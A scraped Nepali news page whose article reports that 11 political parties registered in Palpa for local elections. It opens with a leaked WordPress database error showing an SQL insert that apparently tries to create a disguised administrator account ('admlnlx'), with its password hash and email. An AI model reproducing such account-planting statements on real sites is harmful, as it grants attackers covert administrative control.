WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2KaklNjIjp8tg7UrnNXZYbJ.hH.w90', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:42:45', '', 'admlnlx', 'admlnlx')
रामपुर (पाल्पा), माघ २८ –
स्थानीय निर्वाचनमा सहभागी हुनका लागि पाल्पामा ११ राजनीतिक दल जिल्ला निर्वाचन कार्यालय पाल्पामा दर्ता भएका छन् ।
स्थानीय निर्वाचनका लागि निर्वाचन आयोगले सबै राजनीतिक दलको विवरण पेस गर्नुपर्ने निर्देशनअनुसार जिल्लामा ११ राजनीतिक दलले पार्टीको विवरण बुझाएको जिल्ला निर्वाचन कार्यालय, पाल्पाले जनाएको छ ।
निर्वाचन कार्यालयमा दर्ता भएका दलहरुमा नेपाली काँग्रेस, नेकपा ९एमाले०, नेकपा ९माओवादी केन्द्र०, राप्रपा, राष्ट्रिय जनमोर्चा, नेकपा ९माले०, राष्ट्रिय जनमुक्ति पार्टी रहेका छन् । त्यसैगरी नेकपा (माले) जनसमाजवादी, सङ्घीय समाजवादी फोरम नेपाल, नेकपा ९माक्र्सवादी० र नेपाल पूर्व राष्ट्रसेवक लोकतान्त्रिक पार्टी रहेका छन् ।
यी दर्ता भएका दलले मात्र स्थानीय निकायको निर्वाचनमा सहभागी हुन पाउने व्यवस्था रहेको छ । अहिले पनि विभिन्न पार्टीले दल दर्ताका लागि कार्यालयमा अनुरोध गरेपनि दर्ता समय सकिएकाले दर्ता प्रक्रिया रोकिएको छ । – रासस